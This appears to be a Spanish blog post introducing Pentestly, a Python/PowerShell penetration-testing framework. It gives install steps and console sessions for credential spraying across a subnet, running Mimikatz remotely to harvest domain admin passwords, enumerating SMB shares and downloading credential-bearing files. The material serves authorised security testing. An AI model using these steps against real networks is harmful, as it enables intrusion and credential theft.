Pentestly: un framework que combina Python y Powershell para facilitar el pentesting

Está claro que actualmente hay una tendencia clara a usar Python y Powershell para el desarrollo de muchas herramientas de hacking. Pentestly es un framework muy útil que combina varias de éstas para facilitar el desarrollo de un pentesting:

- recon-ng - base de datos de backend
- wmiexec.py - facilita la ejecución de comandos Powershell vía WMI
- smbmap.py - utilidad para enumerar recursos SMB compartidos
- Invoke-Mimikatz.ps1 - implementación de Mimikatz en Powershell
- powercat.ps1 - funcionalidad Netcat-esque en Powershell
- Invoke-Shellcode.ps1 - usa Meterpreter en Powershell
- CrackMapExec - inspiración para el servidor Mimikatz en Pentestly



Instalación

apt-get install libxml2 libxslt-dev python-dev (Kali Linux 2.0)
git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly

Uso


Cambiar el workspace:
[pentestly][default] > workspaces list

  +------------+
  | Workspaces |
  +------------+
  | default    |
  +------------+

[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project

Cargar desde nmap:
[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options

  Name      Current Value                      Required  Description
  --------  -------------                      --------  -----------
  FILENAME  /root/PROJECT/full-all-alive.xml  yes       Path and filename for nmap XML input

[pentestly][project][nmap_xml] > run

- Usar un fichero con las credenciales:
[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run

- Usar un único usuario y contraseña:
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run

- Usar las credenciales con un conjunto de IPs, por ej. 192.168.8.0/24:
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'

- Obtener los administradores de Dominio y Enterprise
[pentestly][project][login] > load get_domain # Notice fuzzy searching - get_domain finds get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options

  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  default        yes       source of input (see 'show info' for details)

[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2

Ejecutar mimikatz sobre IPs con derechos de ejecución:
[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
Select local interface for hosting scripts

0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1

[*] Execution creds: domain\Admin:adminpassword@192.168.1.1
[*] Success! Admin.DA:p@$$w0rd  - DOMAIN ADMIN!

Mostrar los administradores locales:
[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run

+---------------------------------------------------------------------------------------------------------------+
|      host      | access |  username  |  password  | domain | process | logged_in | success | execute | module |
+---------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 |        | nsportsman | password1! | zojix  |         |           | True    | True    | login  |
+---------------------------------------------------------------------------------------------------------------+

Mostrar los administradores de dominio:
[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run

+--------------------------------------------------------------------------------------------------------------------------+
|      host      | access        | username  |  password       | domain | process | logged_in | success | execute | module |
+--------------------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | Domain Admin  | TheRealDA | </l33TPassword> | zojix  |         |           | True    | True    | login  |
+--------------------------------------------------------------------------------------------------------------------------+

Enumerar recursos compartidos:
[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:BadAdminPassword@192.168.224.252
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})

Mostrar nuevos recursos compartidos:
[pentestly][default][interesting_files] > show pentestly_shares

+------------------------------------------------------------------------------------------------+
| rowid |       host      |    username   | readwrite |      readonly     | noaccess |   module   |
+-------------------------------------------------------------------------------------------------+
| 1     | 192.168.224.252 | Administrator |           | ADMIN$,C,C$,Users | IPC$     | enumshares |
+-------------------------------------------------------------------------------------------------+

Encontrar/Descargar ficheros interesantes:
[pentestly][default][interesting_files] > show options

    Name     Current Value                                                                                                                              Required  Description
    -------  -------------                                                                                                                              --------  -----------
    PATTERN  (Groups.xml|Services.xml|Printers.xml|Drives.xml|DataSources.xml|ScheduledTasks.xml|unattend|important|passw|backup|setup).*[^dll][^exe]$  yes       Regex pattern to look for in filenames
    SOURCE   default                                                                                                                                    

Se puede cambiar el patrón para afinar un poco:
[pentestly][default][interesting_files] > set pattern important.txt|super_secret
PATTERN => important.txt|super_secret
[pentestly][default][interesting_files] > show options

    Name     Current Value               Required  Description
    -------  -------------               --------  -----------
    PATTERN  important.txt|super_secret  yes       Regex pattern to look for in filenames
    SOURCE   default                     yes       source of input (see 'show info' for details)

Ejecutar y descargar los ficheros encontrados:
[pentestly][default][interesting_files] > run
[*] Administrator
[*] Execution creds: workgroup\Administrator:BadAdminPassword@192.168.224.252
[+] Match found! Downloading: Users\Administrator\Desktop\important.txt.txt
192.168.224.252-Users_Administrator_Desktop_important.txt.txt
[+] Match found! Downloading: Users\Administrator\Desktop\super_secret.txt
192.168.224.252-Users_Administrator_Desktop_super_secret.txt

Contribuciones

Crear nuevos módulos es bastante fálcil en Pentestly. A partir del código de skeleton.py:
from libs.pentestlymodule import PentestlyModule

class Module(PentestlyModule):

    meta = {
        'name': 'Your module name goes here',
        'author': 'Developer name goes here',
        'description': 'Description of the module goes here',
        'query': 'SQL QUERY whose result is passed to your module',
        'options': (
            ('Option1', 'Default Value', Required-True/False, 'Description of option'),
        ),
    }

    def module_pre(self):
        # Optional
        # Happens before your module

    def module_run(self, data):
        # Required
        # data is the result from the SQL query set in the options

        ### Few magic functions
        # self.query - Perform an SQL query on the internal database
        results = self.query("select * from pentestly_creds")

        # self.output - print default information to the user
        self.output("Performed an SQL query")
        self.output(results)

        # self.alert - print successful message to the user
        self.success("Yay! We performed successful work")

    def module_post(self):
        # Optional
        # Happens after your module

Los puntos claves aquí son poner la información de meta y la función module_run.

El script debe situarse luego en el directorio  modules/ o en el personal ~/.pentestly/modules para portabilidad.

Fuente: https://github.com/praetorian-inc/pentestly

Comentarios